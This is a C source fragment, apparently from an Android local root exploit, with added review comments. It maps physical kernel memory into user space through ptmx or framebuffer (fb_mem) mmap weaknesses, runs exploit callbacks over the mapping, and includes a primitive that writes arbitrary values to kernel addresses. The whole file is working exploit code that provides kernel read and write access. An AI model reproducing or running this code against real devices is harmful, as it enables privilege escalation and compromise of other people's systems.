/*
 * Try to obtain a user-space view of kernel memory and record its address in
 * kernel_mapped_address.
 *
 * Two mechanisms are tried in order:
 *   1. ptmx_map_memory() at the fixed address PTMX_MEMORY_MAPPED_ADDRESS;
 *   2. fb_mem_mmap(), with the result translated through
 *      fb_mem_convert_to_mmaped_address().
 *
 * Globals written: fb_mmap_fd, kernel_mapped_address, fb_mem_mmap_base.
 * Returns true when either mechanism reports success, false otherwise
 * (including when setup_variables() fails).
 *
 * NOTE(review): both paths presumably depend on a device driver accepting an
 * mmap range that reaches kernel memory; a driver that validates the
 * requested range would make both calls fail here - confirm against the
 * helpers, which are not visible in this block.
 */
bool map_kernel_memory(void)
{
    void *kernel_view;

    /* The physical offset is resolved lazily, only when it is still zero. */
    if (!kernel_physical_offset && !setup_variables()) {
        return false;
    }

    /* Start from the ptmx defaults; -1 marks "no fb_mem descriptor held". */
    fb_mmap_fd = -1;
    kernel_mapped_address = PTMX_MEMORY_MAPPED_ADDRESS;

    if (ptmx_map_memory(PTMX_MEMORY_MAPPED_ADDRESS, kernel_physical_offset, KERNEL_MEMORY_SIZE)) {
        return true;
    }

    /*
     * Fallback path. 0x8000 is subtracted before the offset is handed to the
     * fb_mem helper; the reason is not visible here (presumably the kernel
     * image's offset within its physical region - TODO confirm).
     */
    fb_mem_set_kernel_phys_offset(kernel_physical_offset - 0x8000);
    printf("Attempt fb_mem_exploit...\n");

    fb_mem_mmap_base = fb_mem_mmap(&fb_mmap_fd);

    /*
     * NOTE(review): success is tested as "non-NULL". If fb_mem_mmap() reports
     * failure the way mmap(2) does (MAP_FAILED, which is non-NULL), a failed
     * mapping would be treated as a valid base - confirm the helper's
     * failure value.
     */
    if (!fb_mem_mmap_base) {
        fb_mmap_fd = -1;
        return false;
    }

    kernel_view = fb_mem_convert_to_mmaped_address((void *)KERNEL_BASE_ADDRESS, fb_mem_mmap_base);
    kernel_mapped_address = (unsigned long int)kernel_view;
    return true;
}
/*
 * Map memory through the fb_mem helper, run callback_func against the
 * translated PAGE_OFFSET address, then release the mapping.
 *
 * callback_func  - called once with (translated address, KERNEL_SIZE,
 *                  callback_param); its return value is this function's result.
 * callback_param - opaque pointer passed through unchanged.
 *
 * Returns false without calling the callback when fb_mem_mmap() yields
 * MAP_FAILED.
 */
static bool attempt_mmap_fb_mem_exploit(exploit_memory_callback_t callback_func, void *callback_param)
{
    int fd;
    void *mapping;
    void *kernel_view;
    bool ok;
    unsigned long int phys_offset = get_kernel_physical_offset();

    /*
     * A zero offset leaves the fb_mem helper's current setting untouched.
     * The 0x00008000 adjustment is not explained in this block - TODO confirm
     * its meaning against the helper.
     */
    if (phys_offset != 0) {
        fb_mem_set_kernel_phys_offset(phys_offset - 0x00008000);
    }

    mapping = fb_mem_mmap(&fd);
    if (mapping == MAP_FAILED) {
        return false;
    }

    kernel_view = fb_mem_convert_to_mmaped_address((void *)PAGE_OFFSET, mapping);
    ok = callback_func(kernel_view, KERNEL_SIZE, callback_param);

    /* The mapping is released whatever the callback returned. */
    fb_mem_munmap(mapping, fd);
    return ok;
}
/*
 * Map the fb_mem window, pass its base address to a caller-supplied callback,
 * then unmap it.
 *
 * exploit_callback - invoked once with (mapping base, user_data); its return
 *                    value becomes this function's result.
 * user_data        - opaque pointer passed through unchanged.
 *
 * Returns false without invoking the callback when fb_mem_mmap() yields
 * MAP_FAILED.
 */
bool fb_mem_run_exploit(bool(*exploit_callback)(void *mmap_base_address, void *user_data), void *user_data)
{
    int fd;
    bool outcome;
    void *base = fb_mem_mmap(&fd);

    if (base != MAP_FAILED) {
        outcome = exploit_callback(base, user_data);

        /* Release the mapping regardless of what the callback reported. */
        fb_mem_munmap(base, fd);
        return outcome;
    }

    return false;
}
/*
 * Store one int at the location that `address` translates to inside a fresh
 * fb_mem mapping, then drop the mapping.
 *
 * address - passed to fb_mem_convert_to_mmaped_address() to obtain the
 *           pointer that is written through.
 * value   - the int stored at that pointer.
 *
 * Returns false when fb_mem_mmap() yields MAP_FAILED; otherwise true once the
 * store has been issued. The result of fb_mem_munmap() is not inspected.
 *
 * NOTE(review): no range check on the translated pointer is visible in this
 * block - confirm whether fb_mem_convert_to_mmaped_address() keeps it inside
 * the mapped window.
 */
bool fb_mem_write_value_at_address(unsigned long int address, int value)
{
    int fd;
    int *target;
    void *base = fb_mem_mmap(&fd);

    if (base == MAP_FAILED) {
        return false;
    }

    target = (int *)fb_mem_convert_to_mmaped_address((void *)address, base);
    *target = value;

    fb_mem_munmap(base, fd);
    return true;
}